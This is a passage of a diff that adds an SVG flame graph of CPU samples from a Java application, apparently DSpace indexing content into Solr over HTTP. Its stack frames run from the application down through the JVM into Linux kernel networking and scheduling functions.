+<text  x="425.15" y="415.5" ></text>
+</g>
+<g >
+<title>__GI___libc_write (1 samples, 0.48%)</title><rect x="501.2" y="229" width="5.6" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="504.20" y="239.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (8 samples, 3.83%)</title><rect x="1116.6" y="373" width="45.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1119.60" y="383.5" >org/..</text>
+</g>
+<g >
+<title>futex_wait_queue_me (24 samples, 11.48%)</title><rect x="26.9" y="645" width="135.5" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="29.94" y="655.5" >futex_wait_queue_me</text>
+</g>
+<g >
+<title>perf_pmu_enable.part.0 (16 samples, 7.66%)</title><rect x="173.7" y="517" width="90.4" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="176.73" y="527.5" >perf_pmu_e..</text>
+</g>
+<g >
+<title>org/dspace/core/Context:::removeCached (1 samples, 0.48%)</title><rect x="416.5" y="421" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="419.51" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ProxySelectorRoutePlanner:::determineRoute (1 samples, 0.48%)</title><rect x="1122.2" y="309" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1125.25" y="319.5" ></text>
+</g>
+<g >
+<title>JVM_DoPrivileged (1 samples, 0.48%)</title><rect x="1071.4" y="245" width="5.7" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="1074.44" y="255.5" ></text>
+</g>
+<g >
+<title>tcp_v4_rcv (3 samples, 1.44%)</title><rect x="365.7" y="229" width="16.9" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="368.69" y="239.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (1 samples, 0.48%)</title><rect x="992.4" y="165" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="995.39" y="175.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (24 samples, 11.48%)</title><rect x="275.4" y="725" width="135.5" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="278.36" y="735.5" >do_syscall_64</text>
+</g>
+<g >
+<title>sock_def_readable (1 samples, 0.48%)</title><rect x="371.3" y="181" width="5.7" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="374.34" y="191.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.48%)</title><rect x="715.7" y="277" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="718.74" y="287.5" ></text>
+</g>
+<g >
+<title>org/dspace/browse/BrowseIndex:::getBrowseIndices (1 samples, 0.48%)</title><rect x="992.4" y="277" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="995.39" y="287.5" ></text>
+</g>
+<g >
+<title>ipv4_dst_check (1 samples, 0.48%)</title><rect x="388.3" y="517" width="5.6" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="391.28" y="527.5" ></text>
+</g>
+<g >
+<title>__local_bh_enable_ip (5 samples, 2.39%)</title><rect x="360.0" y="437" width="28.3" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="363.05" y="447.5" >_..</text>
+</g>
+<g >
+<title>poll_schedule_timeout.constprop.0 (2 samples, 0.96%)</title><rect x="1144.8" y="181" width="11.3" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="1147.83" y="191.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/EntityEnclosingRequestWrapper$EntityWrapper:::writeTo (12 samples, 5.74%)</title><rect x="789.1" y="245" width="67.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="792.14" y="255.5" >org/apa..</text>
+</g>
+<g >
+<title>java/net/URI:::&lt;init&gt; (1 samples, 0.48%)</title><rect x="732.7" y="357" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="735.68" y="367.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/BitstreamContentStream:::getStream (1 samples, 0.48%)</title><rect x="772.2" y="373" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="775.20" y="383.5" ></text>
+</g>
+<g >
+<title>call_stub (134 samples, 64.11%)</title><rect x="410.9" y="677" width="756.5" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="413.86" y="687.5" >call_stub</text>
+</g>
+<g >
+<title>java/net/URLEncoder:::encode (1 samples, 0.48%)</title><rect x="913.3" y="325" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="916.35" y="335.5" ></text>
+</g>
+<g >
+<title>org/dspace/eperson/Group:::find (1 samples, 0.48%)</title><rect x="704.4" y="373" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="707.45" y="383.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc/PgPreparedStatement:::executeQuery (1 samples, 0.48%)</title><rect x="715.7" y="325" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="718.74" y="335.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (1 samples, 0.48%)</title><rect x="382.6" y="293" width="5.7" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="385.63" y="303.5" ></text>
+</g>
+<g >
+<title>intel_tfa_pmu_enable_all (16 samples, 7.66%)</title><rect x="173.7" y="485" width="90.4" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="176.73" y="495.5" >intel_tfa_..</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::getColumnNames (1 samples, 0.48%)</title><rect x="958.5" y="341" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="961.52" y="351.5" ></text>
+</g>
+<g >
+<title>java/util/TimSort:::sort (1 samples, 0.48%)</title><rect x="981.1" y="357" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="984.10" y="367.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::indexContent (130 samples, 62.20%)</title><rect x="433.4" y="437" width="734.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="436.44" y="447.5" >org/dspace/discovery/SolrServiceImpl:::indexContent</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (1 samples, 0.48%)</title><rect x="721.4" y="373" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="724.39" y="383.5" ></text>
+</g>
+<g >
+<title>dequeue_task_fair (1 samples, 0.48%)</title><rect x="1150.5" y="85" width="5.6" height="15.0" fill="rgb(248,120,120)" rx="2" ry="2" />
+<text  x="1153.48" y="95.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/AppenderSkeleton:::doAppend (5 samples, 2.39%)</title><rect x="484.3" y="357" width="28.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="487.26" y="367.5" >o..</text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/FormBodyPart:::&lt;init&gt; (6 samples, 2.87%)</title><rect x="738.3" y="373" width="33.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="741.33" y="383.5" >or..</text>
+</g>
+<g >
+<title>try_to_wake_up (1 samples, 0.48%)</title><rect x="371.3" y="85" width="5.7" height="15.0" fill="rgb(237,105,105)" rx="2" ry="2" />
+<text  x="374.34" y="95.5" ></text>
+</g>
+<g >
+<title>Java_java_io_FileOutputStream_writeBytes (1 samples, 0.48%)</title><rect x="501.2" y="261" width="5.6" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="504.20" y="271.5" ></text>
+</g>
+<g >
+<title>nf_conntrack_in (2 samples, 0.96%)</title><rect x="320.5" y="453" width="11.3" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="323.53" y="463.5" ></text>
+</g>
+<g >
+<title>sk_stream_alloc_skb (1 samples, 0.48%)</title><rect x="309.2" y="613" width="5.7" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="312.23" y="623.5" ></text>
+</g>
+<g >
+<title>Java_java_net_PlainSocketImpl_socketSetOption0 (1 samples, 0.48%)</title><rect x="1139.2" y="277" width="5.6" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1142.19" y="287.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::rewriteRequestURI (1 samples, 0.48%)</title><rect x="924.6" y="309" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="927.64" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/ChunkedOutputStream:::flushCache (1 samples, 0.48%)</title><rect x="1133.5" y="213" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1136.54" y="223.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.96%)</title><rect x="568.9" y="245" width="11.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="571.95" y="255.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Item:::getCollections (3 samples, 1.44%)</title><rect x="698.8" y="405" width="16.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="701.80" y="415.5" ></text>
+</g>
+<g >
+<title>[unknown] (1 samples, 0.48%)</title><rect x="10.0" y="725" width="5.6" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="13.00" y="735.5" ></text>
+</g>
+<g >
+<title>__poll (1 samples, 0.48%)</title><rect x="1099.7" y="261" width="5.6" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="1102.67" y="271.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/DefaultListableBeanFactory:::getBeanNamesForType (9 samples, 4.31%)</title><rect x="1003.7" y="357" width="50.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1006.68" y="367.5" >org/s..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::request (8 samples, 3.83%)</title><rect x="1116.6" y="389" width="45.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1119.60" y="399.5" >org/..</text>
+</g>
+<g >
+<title>org/apache/solr/common/params/ModifiableSolrParams:::add (3 samples, 1.44%)</title><rect x="941.6" y="389" width="16.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="944.58" y="399.5" ></text>
+</g>
+<g >
+<title>hrtimer_start_range_ns (1 samples, 0.48%)</title><rect x="930.3" y="69" width="5.6" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="933.29" y="79.5" ></text>
+</g>
+<g >
+<title>__ip_local_out (5 samples, 2.39%)</title><rect x="314.9" y="501" width="28.2" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="317.88" y="511.5" >_..</text>
+</g>
+<g >
+<title>[libjvm.so] (134 samples, 64.11%)</title><rect x="410.9" y="517" width="756.5" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="413.86" y="527.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>do_syscall_64 (24 samples, 11.48%)</title><rect x="26.9" y="709" width="135.5" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="29.94" y="719.5" >do_syscall_64</text>
+</g>
+<g >
+<title>__x64_sys_sendto (20 samples, 9.57%)</title><rect x="292.3" y="709" width="112.9" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="295.30" y="719.5" >__x64_sys_sen..</text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (2 samples, 0.96%)</title><rect x="1144.8" y="309" width="11.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1147.83" y="319.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="1082.7" y="245" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1085.73" y="255.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::error (1 samples, 0.48%)</title><rect x="772.2" y="357" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="775.20" y="367.5" ></text>
+</g>
+<g >
+<title>java/lang/reflect/Method:::invoke (134 samples, 64.11%)</title><rect x="410.9" y="629" width="756.5" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="413.86" y="639.5" >java/lang/reflect/Method:::invoke</text>
+</g>
+<g >
+<title>org/apache/http/impl/entity/StrictContentLengthStrategy:::determineLength (1 samples, 0.48%)</title><rect x="856.9" y="229" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="859.89" y="239.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (4 samples, 1.91%)</title><rect x="1167.4" y="709" width="22.6" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1170.42" y="719.5" >[..</text>
+</g>
+<g >
+<title>[libjli.so] (134 samples, 64.11%)</title><rect x="410.9" y="741" width="756.5" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="413.86" y="751.5" >[libjli.so]</text>
+</g>
+<g >
+<title>java/util/ArrayList:::sort (1 samples, 0.48%)</title><rect x="981.1" y="389" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="984.10" y="399.5" ></text>
+</g>
+<g >
+<title>schedule_hrtimeout_range_clock (2 samples, 0.96%)</title><rect x="1144.8" y="149" width="11.3" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="1147.83" y="159.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/ISO8601DateFormat:::format (1 samples, 0.48%)</title><rect x="506.8" y="277" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="509.84" y="287.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::querySingleTable (1 samples, 0.48%)</title><rect x="704.4" y="325" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="707.45" y="335.5" ></text>
+</g>
+<g >
+<title>__vsnprintf_internal (1 samples, 0.48%)</title><rect x="10.0" y="677" width="5.6" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="13.00" y="687.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.96%)</title><rect x="1088.4" y="85" width="11.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1091.37" y="95.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::hasNext (1 samples, 0.48%)</title><rect x="693.2" y="389" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="696.16" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::execute (2 samples, 0.96%)</title><rect x="1127.9" y="309" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1130.89" y="319.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/DefaultListableBeanFactory:::getBeansOfType (12 samples, 5.74%)</title><rect x="986.7" y="373" width="67.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="989.75" y="383.5" >org/spr..</text>
+</g>
+<g >
+<title>[unknown] (27 samples, 12.92%)</title><rect x="10.0" y="757" width="152.4" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="13.00" y="767.5" >[unknown]</text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::preProcess (1 samples, 0.48%)</title><rect x="935.9" y="309" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="938.93" y="319.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::equals (1 samples, 0.48%)</title><rect x="964.2" y="325" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="967.16" y="335.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/lang/time/DateUtils:::isSameDay (1 samples, 0.48%)</title><rect x="484.3" y="293" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="487.26" y="303.5" ></text>
+</g>
+<g >
+<title>java/lang/Object:::clone (1 samples, 0.48%)</title><rect x="489.9" y="277" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="492.90" y="287.5" ></text>
+</g>
+<g >
+<title>java/lang/StringBuilder:::&lt;init&gt; (1 samples, 0.48%)</title><rect x="467.3" y="405" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="470.32" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/XML:::escape (5 samples, 2.39%)</title><rect x="885.1" y="261" width="28.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="888.12" y="271.5" >o..</text>
+</g>
+<g >
+<title>sun/util/calendar/ZoneInfo:::clone (1 samples, 0.48%)</title><rect x="489.9" y="293" width="5.7" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="492.90" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::doSendRequest (1 samples, 0.48%)</title><rect x="1133.5" y="293" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1136.54" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::rewriteRequestURI (1 samples, 0.48%)</title><rect x="1077.1" y="325" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1080.08" y="335.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::preProcess (2 samples, 0.96%)</title><rect x="1105.3" y="325" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1108.31" y="335.5" ></text>
+</g>
+<g >
+<title>psi_task_change (1 samples, 0.48%)</title><rect x="371.3" y="37" width="5.7" height="15.0" fill="rgb(238,105,105)" rx="2" ry="2" />
+<text  x="374.34" y="47.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="715.7" y="197" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="718.74" y="207.5" ></text>
+</g>
+<g >
+<title>clock_gettime@GLIBC_2.2.5 (1 samples, 0.48%)</title><rect x="1054.5" y="389" width="5.6" height="15.0" fill="rgb(224,85,85)" rx="2" ry="2" />
+<text  x="1057.50" y="399.5" ></text>
+</g>
+<g >
+<title>org/dspace/browse/SolrBrowseCreateDAO:::additionalIndex (18 samples, 8.61%)</title><rect x="518.1" y="405" width="101.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="521.13" y="415.5" >org/dspace/b..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="1156.1" y="133" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1159.12" y="143.5" ></text>
+</g>
+<g >
+<title>__wake_up_common (1 samples, 0.48%)</title><rect x="371.3" y="133" width="5.7" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="374.34" y="143.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/lang/time/DateUtils:::isSameDay (2 samples, 0.96%)</title><rect x="484.3" y="309" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="487.26" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::callAppenders (5 samples, 2.39%)</title><rect x="484.3" y="389" width="28.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="487.26" y="399.5" >o..</text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject$MetadataCache:::get (1 samples, 0.48%)</title><rect x="619.8" y="373" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="622.76" y="383.5" ></text>
+</g>
+<g >
+<title>__tcp_push_pending_frames (14 samples, 6.70%)</title><rect x="314.9" y="597" width="79.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="317.88" y="607.5" >__tcp_pus..</text>
+</g>
+<g >
+<title>tcp_sendmsg (17 samples, 8.13%)</title><rect x="297.9" y="645" width="96.0" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="300.94" y="655.5" >tcp_sendmsg</text>
+</g>
+<g >
+<title>org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (1 samples, 0.48%)</title><rect x="930.3" y="277" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="933.29" y="287.5" ></text>
+</g>
+<g >
+<title>tcp_rcv_established (2 samples, 0.96%)</title><rect x="371.3" y="197" width="11.3" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="374.34" y="207.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.48%)</title><rect x="687.5" y="389" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="690.51" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/util/ClientUtils:::writeVal (6 samples, 2.87%)</title><rect x="879.5" y="277" width="33.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="882.47" y="287.5" >or..</text>
+</g>
+<g >
+<title>do_syscall_64 (2 samples, 0.96%)</title><rect x="1144.8" y="229" width="11.3" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1147.83" y="239.5" ></text>
+</g>
+<g >
+<title>nf_conntrack_tcp_packet (2 samples, 0.96%)</title><rect x="320.5" y="437" width="11.3" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="323.53" y="447.5" ></text>
+</g>
+<g >
+<title>new_sync_write (1 samples, 0.48%)</title><rect x="501.2" y="117" width="5.6" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="504.20" y="127.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (1 samples, 0.48%)</title><rect x="964.2" y="357" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="967.16" y="367.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (2 samples, 0.96%)</title><rect x="456.0" y="405" width="11.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="459.03" y="415.5" ></text>
+</g>
+<g >
+<title>__netif_receive_skb_one_core (5 samples, 2.39%)</title><rect x="360.0" y="325" width="28.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="363.05" y="335.5" >_..</text>
+</g>
+<g >
+<title>__vsnprintf_internal (2 samples, 0.96%)</title><rect x="15.6" y="741" width="11.3" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="18.65" y="751.5" ></text>
+</g>
+<g >
+<title>vfs_write (1 samples, 0.48%)</title><rect x="501.2" y="149" width="5.6" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="504.20" y="159.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::find (1 samples, 0.48%)</title><rect x="704.4" y="357" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="707.45" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::execute (13 samples, 6.22%)</title><rect x="789.1" y="325" width="73.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="792.14" y="335.5" >org/apac..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/QueryRequest:::process (11 samples, 5.26%)</title><rect x="1054.5" y="405" width="62.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1057.50" y="415.5" >org/ap..</text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (9 samples, 4.31%)</title><rect x="1065.8" y="357" width="50.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1068.79" y="367.5" >org/a..</text>
+</g>
+<g >
+<title>org/apache/http/client/utils/URLEncodedUtils:::urlDecode (1 samples, 0.48%)</title><rect x="924.6" y="245" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="927.64" y="255.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (2 samples, 0.96%)</title><rect x="1144.8" y="245" width="11.3" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="1147.83" y="255.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/AbstractMultipartForm:::encode (8 samples, 3.83%)</title><rect x="811.7" y="181" width="45.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="814.72" y="191.5" >org/..</text>
+</g>
+<g >
+<title>java/lang/StringBuilder:::toString (1 samples, 0.48%)</title><rect x="478.6" y="405" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="481.61" y="415.5" ></text>
+</g>
+<g >
+<title>__sched_text_start (17 samples, 8.13%)</title><rect x="168.1" y="565" width="96.0" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="171.09" y="575.5" >__sched_tex..</text>
+</g>
+<g >
+<title>java/net/AbstractPlainSocketImpl:::setOption (1 samples, 0.48%)</title><rect x="1139.2" y="309" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1142.19" y="319.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="10.0" y="741" width="5.6" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="13.00" y="751.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (15 samples, 7.18%)</title><rect x="777.8" y="373" width="84.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.85" y="383.5" >org/apach..</text>
+</g>
+<g >
+<title>simple_copy_to_iter (1 samples, 0.48%)</title><rect x="269.7" y="597" width="5.7" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="272.71" y="607.5" ></text>
+</g>
+<g >
+<title>__send (24 samples, 11.48%)</title><rect x="275.4" y="757" width="135.5" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="278.36" y="767.5" >__send</text>
+</g>
+<g >
+<title>org/dspace/content/Bundle:::getName (1 samples, 0.48%)</title><rect x="619.8" y="405" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="622.76" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/http/client/protocol/RequestClientConnControl:::process (1 samples, 0.48%)</title><rect x="1105.3" y="309" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1108.31" y="319.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::doCreateBean (1 samples, 0.48%)</title><rect x="992.4" y="341" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="995.39" y="351.5" ></text>
+</g>
+<g >
+<title>ip_queue_xmit (14 samples, 6.70%)</title><rect x="314.9" y="549" width="79.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="317.88" y="559.5" >ip_queue_..</text>
+</g>
+<g >
+<title>java/util/LinkedList$ListItr:::next (1 samples, 0.48%)</title><rect x="806.1" y="181" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="809.08" y="191.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="687.5" y="341" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="690.51" y="351.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.48%)</title><rect x="930.3" y="229" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="933.29" y="239.5" ></text>
+</g>
+<g >
+<title>sun/net/spi/DefaultProxySelector$3:::run (1 samples, 0.48%)</title><rect x="1071.4" y="181" width="5.7" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="1074.44" y="191.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (16 samples, 7.66%)</title><rect x="173.7" y="469" width="90.4" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="176.73" y="479.5" >__intel_pm..</text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::subAppend (1 samples, 0.48%)</title><rect x="772.2" y="261" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
